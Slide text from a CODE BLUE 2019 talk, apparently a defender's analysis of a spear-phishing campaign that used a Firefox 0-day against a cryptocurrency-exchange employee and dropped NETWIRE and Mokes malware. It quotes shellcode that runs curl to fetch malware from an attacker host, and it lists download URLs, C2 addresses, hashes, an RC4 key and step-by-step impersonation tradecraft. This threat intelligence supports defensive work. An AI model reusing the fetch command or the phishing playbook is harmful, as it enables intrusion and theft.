  • 13. CODE BLUE 2019 @TOKYO Email Conversation - Victim receives an email through his personal account - sender - nm603@cam.ac.uk - Legit from cam.ac.uk - Link uses legit cam.ac.uk - Adams Prize is 
 “Looking for field experts” - LinkedIn profile 13
  • 14. CODE BLUE 2019 @TOKYO Email Conversation 14 - Victim receives an email through his personal account - sender - nm603@cam.ac.uk - Legit from cam.ac.uk - Link uses legit cam.ac.uk - Adams Prize is 
 “Looking for field experts” - LinkedIn profile
  • 15. CODE BLUE 2019 @TOKYO Email Conversation - LinkedIn Profile - 100+ connections - Nice fit to the story 15
  • 16. CODE BLUE 2019 @TOKYO Email Conversation - Victim shares conversation with the attacker doubtlessly 16
  • 17. CODE BLUE 2019 @TOKYO Email Conversation - Victim gets the exploit link, ID, temporary PW 17
  • 18. CODE BLUE 2019 @TOKYO Email Conversation - Victim gets the exploit link, ID, temporary PW 18
  • 19. CODE BLUE 2019 @TOKYO Web Browsing - Victim visits the URL … to see a warning 19
  • 20. CODE BLUE 2019 @TOKYO Web Browsing - Victim visits the URL … to see a warning - “Firefox only” 20 Official Firefox Page
  • 21. CODE BLUE 2019 @TOKYO Web Browsing - Victim visits the URL … to see a warning - “Firefox only” 21 Official Firefox Page
  • 22. CODE BLUE 2019 @TOKYO Web Browsing - With Firefox, web page shows up 22
  • 23. CODE BLUE 2019 @TOKYO Exploit - Firefox downloaded exploit javascript - shellcode uses curl http://x.x.x.x/malw so it doesn’t trigger MacOS GateKeeper - The attack was stopped here - Detected, suspended & killed - Red flag based on various indictors + in-house tools 23
  • 24. CODE BLUE 2019 @TOKYO Exploit - Firefox downloaded exploit javascript - shellcode uses curl http://x.x.x.x/malw so it doesn’t trigger MacOS GateKeeper - The attack was stopped here - Detected, suspended & killed - Red flag based on various indictors + in-house tools 24
  • 25. CODE BLUE 2019 @TOKYO Response - Victim gets interrogated 25
  • 26. CODE BLUE 2019 @TOKYO Response - Victim gets interrogated Just kidding.. - Victim gets interviewed and helps security team get the picture - Security team follows up, prepare additional tracking - Stage1 sends system information, downloads stage2 malware 26
  • 27. CODE BLUE 2019 @TOKYO Response - Victim gets interrogated Just kidding.. - Victim gets interviewed and helps security team get the picture - Security team follows up, prepare additional tracking - Stage1 sends system information, downloads stage2 malware - Stage1 - macos.netwire variant
 Stage2 - macos.mokes variant 27
  • 28. CODE BLUE 2019 @TOKYO Perspective 2: Attackers 28 What lies beneath
  • 29. CODE BLUE 2019 @TOKYO Prepare Weapons - Prepare weaponized exploits - Firefox code execution (CVE-2019-11707) - Firefox sandbox escape (CVE-2019-11708) 29
  • 30. CODE BLUE 2019 @TOKYO Prepare Weapons - Prepare malwares - Stage 1 - Report victim information - Scout. Small, new, low detection - Stage 2 - Full Remote Administrator Tool 30
  • 31. CODE BLUE 2019 @TOKYO Prepare Weapons - Prepare malwares - Stage 1 - Report victim information - Scout. Small, new, low detection - Stage 2 - Full Remote Administrator Tool 31
  • 32. CODE BLUE 2019 @TOKYO Prepare Infra - Prepare servers - C2 - Stage 1 - 89.34.111.113 (qhoster.com, Uruguay) - Stage 2 - 185.49.69.210 (leaseweb.com, UK)
 - 142.93.110.250 (digitalocean.com, US) - Host malware - 185.162.131.96 (king-servers.com, Russia) 32
  • 33. CODE BLUE 2019 @TOKYO Prepare Infra - Prepare servers - Host exploit - 54.38.93.182 (ovh.com, France) - Buy domain analyticsfit.com - Payment for the servers - Credit card, PayPal, BTC, ZCash, Monero, etc 33
  • 34. CODE BLUE 2019 @TOKYO Hack Accounts - Hack accounts for attack - At least 2 accounts from cam.ac.uk hacked - nm603@, grh37@, ... 34
  • 35. CODE BLUE 2019 @TOKYO Hack Accounts - Accounts’ hack method is undisclosed - Phishing on individuals? - Credential stuffing? (Using leaked ID/passwords) - Brute force? - DB compromise? 35
  • 36. CODE BLUE 2019 @TOKYO Hack Accounts - The University has a bold service, useful for OSINT - anyone can list accounts - http://jackdaw.cam.ac.uk/mailsearch/ - Email account search 
 service - Useful for everyone
 (Students, and…) 36
  • 37. CODE BLUE 2019 @TOKYO Hack Accounts - The University has a bold service, useful for OSINT - anyone can list accounts - http://jackdaw.cam.ac.uk/mailsearch/ - Email account search 
 service - Useful for everyone
 (Students, and…) 37
  • 38. CODE BLUE 2019 @TOKYO University Accounts - Service for the account owners: - Email address: nm603@cam.ac.uk - Personal web hosting - hxxp://people.ds.cam.ac.uk/nm603 38
  • 39. CODE BLUE 2019 @TOKYO University Accounts - Service for the account owners: - Email address: nm603@cam.ac.uk - Personal web hosting - hxxp://people.ds.cam.ac.uk/nm603 39 Makes it all look authentic
  • 40. CODE BLUE 2019 @TOKYO Prepare Website - Prepare web pages on people.ds.cam.ac.uk - Fake University site 40
  • 41. CODE BLUE 2019 @TOKYO Prepare Website - Prepare web pages on people.ds.cam.ac.uk - Add simple javascript for social engineering - “Please use Firefox …” - Load exploit 41
  • 42. CODE BLUE 2019 @TOKYO Script on Fake Website 42
  • 43. CODE BLUE 2019 @TOKYO Script on Fake Website - if (macos && not firefox) then show “use Firefox” message 43
  • 44. CODE BLUE 2019 @TOKYO Script on Fake Website - if (macos && not firefox) then show “use Firefox” message 44
  • 45. CODE BLUE 2019 @TOKYO Script on Fake Website - if (macos && firefox) or (not macos) then load /script.js
 
 
 
 - So people.ds.cam.ac.uk/script.js must be the exploit! 45
  • 46. CODE BLUE 2019 @TOKYO Script on Fake Website - So people.ds.cam.ac.uk/script.js must be the exploit! 46
  • 47. CODE BLUE 2019 @TOKYO Script on Fake Website - So people.ds.cam.ac.uk/script.js must be the exploit!
 → No. 47 Actual packet capture of victim at the time of attack
  • 48. CODE BLUE 2019 @TOKYO Script on Fake Website - So people.ds.cam.ac.uk/script.js must be the exploit!
 → No. 48
  • 49. CODE BLUE 2019 @TOKYO Script on Fake Website - Actual exploit code was loaded at the end of HTML - Made it look like Google’s analytics.js - All websites have them at the end - HTTPS 49
  • 50. CODE BLUE 2019 @TOKYO Prepare John Doe - The accounts they hacked are [nm603, grh37] - Make up names accordingly: Neil Morris, Gregory Harris - Join LinkedIn, make profile fit to the storyline (Univ staff) - Add connections, 100++ - How we all love to accept random requests - Write a nice email signature - Add links to website, LinkedIn 50
  • 51. CODE BLUE 2019 @TOKYO Prepare John Doe - The accounts they hacked are [nm603, grh37] - Make up names accordingly: Neil Morris, Gregory Harris - Join LinkedIn, make profile fit to the storyline (Univ staff) - Add connections, 100++ - How we all love to accept random requests - Write a nice email signature - Add links to website, LinkedIn 51
  • 52. CODE BLUE 2019 @TOKYO Prepare John Doe - The accounts they hacked are [nm603, grh37] - Make up names accordingly: Neil Morris, Gregory Harris - Join LinkedIn, make profile fit to the storyline (Univ staff) - Add connections, 100++ - How we all love to accept random requests - Write a nice email signature - Add links to website, LinkedIn 52
  • 53. CODE BLUE 2019 @TOKYO Start Operation - Set targets - look for cryptocurrency exchange employees - Start by opening conversation through email - Evaluate targets through conversation - Select targets related to cryptocurrency exchanges - Guide ONLY selected targets to the exploit page 53
  • 54. CODE BLUE 2019 @TOKYO Start Operation - Set targets - look for cryptocurrency exchange employees - Start by opening conversation through email - Evaluate targets through conversation - Select targets related to cryptocurrency exchanges - Guide ONLY selected targets to the exploit page 54
  • 55. CODE BLUE 2019 @TOKYO Operation: Evaluate Targets - Evaluate targets through conversation (cont’d) - another case - https://robertheaton.com/2019/06/24/i-was-7-words-away-from-being-spear- phished/ - Review on how he “almost” got hacked by this campaign - Author communicated via email with grh37@cam.ac.uk - He was not guided to the final exploit page - Initially selected as target, but evaluated out. 55
  • 56. CODE BLUE 2019 @TOKYO Operation: Evaluate Targets - Evaluate targets through conversation (cont’d) - another case - https://robertheaton.com/2019/06/24/i-was-7-words-away-from-being-spear- phished/ - Review on how he “almost” got hacked by this campaign - Author communicated via email with grh37@cam.ac.uk - He was not guided to the final exploit page - Initially selected as target, but evaluated out. 56
  • 57. CODE BLUE 2019 @TOKYO Operation: Evaluate Targets - Evaluate targets through conversation (cont’d) - another case - https://robertheaton.com/2019/06/24/i-was-7-words-away-from-being-spear- phished/
 
 
 
 
 
 
 
 
 57
  • 58. CODE BLUE 2019 @TOKYO Operation: Evaluate Targets - Evaluate targets through conversation (cont’d) - https://robertheaton.com/2019/06/24/i-was-7-words-away-from-being-spear- phished/ 58
  • 59. CODE BLUE 2019 @TOKYO Operation: Evaluate Targets - Evaluate targets through conversation (cont’d) - https://robertheaton.com/2019/06/24/i-was-7-words-away-from-being-spear- phished/ 59
  • 60. CODE BLUE 2019 @TOKYO Operation: Goal - Initial exploit → run stage 1 malware - Stage 1 malware reports information about victim - Stage 1 malware downloads stage 2 malware (full RAT) - Go for profit!! $$ 60
  • 61. CODE BLUE 2019 @TOKYO Perspective 3: Blue Team 61 What can we see? Challenges?
  • 62. CODE BLUE 2019 @TOKYO Blue Team Downsides - Cliche, yes - Too many stuff to watch - Employees from many countries - Huge infrastructure - Countless servers (we have our own AWS - “Verda”) 62
  • 63. CODE BLUE 2019 @TOKYO Blue Team Weapons - From Infrastructure - Network based defense/detection methods - Network visibility solutions to see HTTPS connection - From Endpoint - Endpoint Detection & Response / Antivirus - Patch Management System - Various monitoring solutions, etc 63
  • 64. CODE BLUE 2019 @TOKYO Blue Team Weapons - From Infrastructure - Network based defense/detection methods - Network visibility solutions to see HTTPS connection - From Endpoint - Endpoint Detection & Response / Antivirus - Patch Management System - Various monitoring solutions, etc 64
  • 65. CODE BLUE 2019 @TOKYO Blue Team Weapons - Honeypots, sandboxes - Indicators of Compromise service - Network segregation / air-gapping - Authentication, 2FA - Desktop Virtualization - More & more…
 
 → Usable security: should avoid oppressing productivity 65
  • 66. CODE BLUE 2019 @TOKYO Blue Team Weapons - Honeypots, sandboxes - Indicators of Compromise service - Network segregation / air-gapping - Authentication, 2FA - Desktop Virtualization - More & more…
 
 → Usable security: should avoid oppressing productivity 66
  • 67. CODE BLUE 2019 @TOKYO Blue Team Weapons - Honeypots, sandboxes - Indicators of Compromise service - Network segregation / air-gapping - Authentication, 2FA - Desktop Virtualization - More & more…
 
 → Usable security: should avoid oppressing productivity 67
  • 68. CODE BLUE 2019 @TOKYO Pain Point for Blue Team - Attackers sent email to victim’s personal Gmail account - Legit cam.ac.uk email + website - HTTPS + encrypted communication - Low detection (Stage1=1, Stage2=0 detection on VirusTotal) - Encrypted, non-HTTPS protocol for C2 connection on port 443 - Diverse use of servers (exploit, malware download, c2, etc) - Download stage2 outside of corp network to avoid detection 68
  • 69. CODE BLUE 2019 @TOKYO Pain Point for Blue Team - Attackers sent email to victim’s personal Gmail account - Legit cam.ac.uk email + website - HTTPS + encrypted communication - Low detection (Stage1=1, Stage2=0 detection on VirusTotal) - Encrypted, non-HTTPS protocol for C2 connection on port 443 - Diverse use of servers (exploit, malware download, c2, etc) - Download stage2 outside of corp network to avoid detection 69
  • 70. CODE BLUE 2019 @TOKYO Pain Point for Blue Team - Attackers sent email to victim’s personal Gmail account - Legit cam.ac.uk email + website - HTTPS + encrypted communication - Low detection (Stage1=1, Stage2=0 detection on VirusTotal) - Encrypted, non-HTTPS protocol for C2 connection on port 443 - Diverse use of servers (exploit, malware download, c2, etc) - Download stage2 outside of corp network to avoid detection 70
  • 71. CODE BLUE 2019 @TOKYO Breadcrumbs for Blue Team - Shellcode - curl - macho(executable) download - Communication to suspicious IP addresses (C2) - Unknown new executable files - Security team had resource to analyze & follow up - Plus other undisclosable indicators & methods 71
  • 72. CODE BLUE 2019 @TOKYO Breadcrumbs for Blue Team - Shellcode - curl - macho(executable) download - Communication to suspicious IP addresses (C2) - Unknown new executable files - Security team had resource to analyze & follow up - Plus other undisclosable indicators & methods 72
  • 73. CODE BLUE 2019 @TOKYO Breadcrumbs for Blue Team - Shellcode - curl - macho(executable) download - Communication to suspicious IP addresses (C2) - Unknown new executable files - Security team had resource to analyze & follow up - Plus other undisclosable indicators & methods 73
  • 74. CODE BLUE 2019 @TOKYO Malware Information 74 Stage 1 & 2
  • 75. CODE BLUE 2019 @TOKYO Stage 1 - Overview - NETWIRE - Commercial administration tool - Agent builder 75
  • 76. CODE BLUE 2019 @TOKYO Stage 1 - Overview - NETWIRE - Commercial administration tool - Agent builder 76
  • 77. CODE BLUE 2019 @TOKYO Stage 1 - Overview - Hash - MD5 - de3a8b1e149312dac5b8584a33c3f3c6 - SHA256 - 07a4e04ee8b4c8dc0f7507f56dc24db00537d4637afee43dbb9357d4d54f6ff4 - Downloaded from - hxxp://185.162.131.96/i/IconServicesAgent 77
  • 78. CODE BLUE 2019 @TOKYO Stage 1 - Overview - C2 Server - 89.34.111.113 - port closed - Binary is not signed 78
  • 79. CODE BLUE 2019 @TOKYO Stage 1 - NETWIRE - C2 Protocol - https://github.com/pan-unit42/public_tools/blob/master/netwire/ commands.json - XOR command with xe3 - Handle C2 command func at 0x4109 79
  • 80. CODE BLUE 2019 @TOKYO Stage 1 - NETWIRE - Report user/host information - Report user external IP 80
  • 81. CODE BLUE 2019 @TOKYO Stage 1 - NETWIRE - List process - Start shell 81
  • 82. CODE BLUE 2019 @TOKYO Stage 1 - NETWIRE - Search / Write / Execute file - Heartbeat (I’m alive) 82
  • 83. CODE BLUE 2019 @TOKYO Stage 1 - NETWIRE 83
  • 84. CODE BLUE 2019 @TOKYO Stage 1 - NETWIRE - Persistence 84
  • 85. CODE BLUE 2019 @TOKYO Stage 1 - NETWIRE - Persistence 85
  • 86. CODE BLUE 2019 @TOKYO Stage 1 - NETWIRE - Persistence - “Don’t want to die” - Adds itself to signal handler 86
  • 87. CODE BLUE 2019 @TOKYO Stage 1 - NETWIRE - Downloads stage 2 - Shell executed after downloading … left a shell history file 87
  • 88. CODE BLUE 2019 @TOKYO Stage 1 - string “hyd7u5jdi8” - Unique string found -> RC4 key - This netwire binary contains 4 RC4 keys in total. - Key string “hyd7u5jdi8” is used only once for decrypting “%Rand%” 88
  • 89. CODE BLUE 2019 @TOKYO Stage 1 - variants - hxxp://185.162.131.96 (download server) is still up (Apache) - Brute-forced server: found some variants in directory - hxxp://185.162.131.96/i/195/195
 hxxp://185.162.131.96/i/kr
 hxxp://185.162.131.96/i/kri
 hxxp://185.162.131.96/i/pm
 hxxp://185.162.131.96/i/pmi
 hxxp://185.162.131.96/i/thk - Same code, different data by different RC4 key - But has same key “hyd7u5jdi8” 89
  • 90. CODE BLUE 2019 @TOKYO Stage 1 - variants - hxxp://185.162.131.96 (download server) is still up (Apache) - Brute-forced server: found some variants in directory - hxxp://185.162.131.96/i/195/195
 hxxp://185.162.131.96/i/kr
 hxxp://185.162.131.96/i/kri
 hxxp://185.162.131.96/i/pm
 hxxp://185.162.131.96/i/pmi
 hxxp://185.162.131.96/i/thk - Same code, different data by different RC4 key - But has same key “hyd7u5jdi8” 90
  • 91. CODE BLUE 2019 @TOKYO Stage 1 - variants - hxxp://185.162.131.96/i/IconServicesAgent de3a8b1e149312dac5b8584a33c3f3c6 - hxxp://185.162.131.96/i/195/195 b6f92b20816f23c147445bd5eec86a06 - hxxp://185.162.131.96/i/kr 8b2b7537c792ecf24d8ee7b9fbb942f8 - hxxp://185.162.131.96/i/kri 5030422b3428c0f938e3ad03720ca9e8 - hxxp://185.162.131.96/i/pm 70286abc22eca9a9cbea24e551c891cd - hxxp://185.162.131.96/i/pmi de3a8b1e149312dac5b8584a33c3f3c6 - hxxp://185.162.131.96/i/thk fc99b1407655674573ee4167f1e3dcbd 91
  • 92. CODE BLUE 2019 @TOKYO Stage 1 - variants - Uploaded to VT - https://tinyurl.com/brutedown - Downloadable here - https://tinyurl.com/brutedown2 92
  • 93. CODE BLUE 2019 @TOKYO Stage 2 - Overview - Hash - MD5 - af10aad603fe227ca27077b83b26543b - SHA256 - 97200b2b005e60a1c6077eea56fc4bb3e08196f14ed692b9422c96686fbfc3ad - Downloaded by stage1 93
  • 94. CODE BLUE 2019 @TOKYO Stage 2 - Overview - macos.Mokes - Remote administration tool - C2 Server - 185.49.69.210 port 443|80 (closed) - athlon4free2updates1.com / 142.93.110.250 - Alive but not sending payload 94
  • 95. CODE BLUE 2019 @TOKYO Stage 2 - Certificate invalid 95
  • 96. CODE BLUE 2019 @TOKYO Stage 2 - Overview - Built with QT - huge binary size (13MB) - FLIRT for QT versions, OpenSSL - Only 20% identified - Also not signed 96
  • 97. CODE BLUE 2019 @TOKYO Stage 2 - Self copy as randomly one of these names 97
  • 98. CODE BLUE 2019 @TOKYO Stage 2 - Persistence 98
  • 99. CODE BLUE 2019 @TOKYO Stage 2 - Hides application from Macos Dock - Searches for file - AutoFileSearchTask::files_to_search 99
  • 100. CODE BLUE 2019 @TOKYO More About Campaign 100 Connecting dots on their “Work habits”
  • 101. CODE BLUE 2019 @TOKYO Previous Analysis - Named - Only recently referred as “HydSeven” after coincheck attack - From RC4 key string “hyd7u5jdi8” - History - Known for attacking banks, undisclosed financial biz - Introduced in FireEye Trend (2017) - https://tinyurl.com/firetrend - Nice overview by mertsarica.com (2017) - https://tinyurl.com/1mertsa - https://tinyurl.com/2mertsa 101
  • 102. CODE BLUE 2019 @TOKYO Previous Analysis - Attack analysis by Exatel (2016) - https://tinyurl.com/1exatel - Analysis on coincheck hack by LAC Watch (2019) - https://tinyurl.com/lac-coincheck 102
  • 103. CODE BLUE 2019 @TOKYO Initial Compromise - Based on spear phishing - Office document with macro - Office 1-day exploit (EPS) - WinRar 1-day exploit (ACE path) - 0-day exploit (FireFox) 103
  • 104. CODE BLUE 2019 @TOKYO Favorite Method - Hacked London School of Economics account - Use the account for email communication - We need expert like you as jury for ‘Banker Awards’ 104 [https://tinyurl.com/1mertsa]
  • 105. CODE BLUE 2019 @TOKYO Favorite Method - Hacked London School of Economics account - Use the account for email communication - We need expert like you as jury for ‘Banker Awards’ 105 [https://tinyurl.com/1mertsa]
  • 106. CODE BLUE 2019 @TOKYO Favorite Method - Hacked London School of Economics account - Use the account for email communication - We need expert like you as jury for ‘Banker Awards’ - Abuse university’s web hosting for phishing 106 [https://tinyurl.com/1mertsa]
  • 107. CODE BLUE 2019 @TOKYO Favorite Method - Not afraid of making conference calls with victims 107 [https://tinyurl.com/2mertsa]
  • 108. CODE BLUE 2019 @TOKYO Favorite Method - Abuse LinkedIn account - Impersonate someone with same/similar name 108 [https://tinyurl.com/1mertsa]
  • 109. CODE BLUE 2019 @TOKYO Favorite Method - Hacked Angelina College 109 [https://tinyurl.com/firetrend]
  • 110. CODE BLUE 2019 @TOKYO Favorite VPS - This attack: OVH, LeaseWeb, King-Servers, QHoster - Previous campaign - OVH x 6 - LeaseWeb x 6 - King-Servers x 1 - QHoster x 1 - Etc (Vultr, netsec.com, HostSailor, etc) 110
  • 111. CODE BLUE 2019 @TOKYO But… - Why him? - Attack on 1 employee - For exchange? Individual? 111
  • 112. CODE BLUE 2019 @TOKYO Conclusion - Attackers - Decent social engineering - Use of compromised university accounts (email/site) - Responsive communication - Use of 0-day/n-day exploits - or just office+macro - Malware - NETWIRE/MOKES - Platform independent source code (Windows, MacOS, Linux) - Manage low detection from AV - Use digital certificates for Windows binary - Active - Skilled operators 112
  • 113. CODE BLUE 2019 @TOKYO 113 Minimize the risk while maintaining usable security User education: Consciousness on 
 spear-phishing Defense in depth: Block SOMEWHERE in the middle
 Block SOMETIME in the middle Detections & sensors: EPP(AV), Network monitoring , honeypots, IoC, Human resource Conclusion - Countermeasure
  • 114. CODE BLUE 2019 @TOKYO 114 - Contact - cmpdebugger@gmail.com - @jz__ - id: heungsookang Questions?